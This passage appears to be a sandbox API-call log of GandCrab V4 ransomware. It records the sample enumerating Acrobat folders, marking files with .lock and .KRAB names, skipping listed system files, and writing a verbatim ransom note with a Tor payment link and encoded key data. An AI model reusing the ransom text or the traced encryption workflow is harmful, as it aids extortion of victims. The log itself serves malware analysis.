lpFindFileData=0x338e850) returned 1 [0056.170] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.170] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.170] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a08d2ca4dee3d.lock" [0056.170] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.172] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0056.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a08d2ca4dee3d.lock") returned 78 [0056.172] lstrlenW (lpString=".lock") returned 5 [0056.172] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.173] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.173] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.173] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.173] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.173] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0056.173] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0056.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="Forms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0056.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\" [0056.174] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.174] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.174] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.174] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.174] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.174] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.174] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.175] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\\\KRAB-DECRYPT.txt") returned 78 [0056.175] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0056.175] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.175] WriteFile (in: hFile=0x454, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.176] CloseHandle (hObject=0x454) returned 1 [0056.176] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.177] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.177] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x176)) [0056.177] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.177] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.178] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.178] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a08d2ca4dee3d.lock") returned 84 [0056.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x454 [0056.207] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.207] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\") returned 61 [0056.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*" [0056.207] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbe0a0 [0056.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.208] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.208] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.208] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.208] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.208] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a08d2ca4dee3d.lock" [0056.208] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.208] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 89 [0056.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\d2ca4a08d2ca4dee3d.lock") returned 84 [0056.209] lstrlenW (lpString=".lock") returned 5 [0056.209] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.209] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.209] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.209] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.210] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.210] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.210] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.210] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\KRAB-DECRYPT.txt" [0056.210] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.210] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\KRAB-DECRYPT.txt.KRAB") returned 82 [0056.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\KRAB-DECRYPT.txt") returned 77 [0056.210] lstrlenW (lpString=".txt") returned 4 [0056.210] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.210] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.211] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\KRAB-DECRYPT.txt") returned 77 [0056.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\KRAB-DECRYPT.txt") returned 77 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.211] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.212] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0056.212] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.212] CloseHandle (hObject=0x454) returned 1 [0056.212] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.212] lstrcmpW (lpString1="JSCache", lpString2=".") returned 1 [0056.212] lstrcmpW (lpString1="JSCache", lpString2="..") returned 1 [0056.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="JSCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0056.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\" [0056.212] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.213] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.213] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.214] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\\\KRAB-DECRYPT.txt") returned 80 [0056.214] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0056.215] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 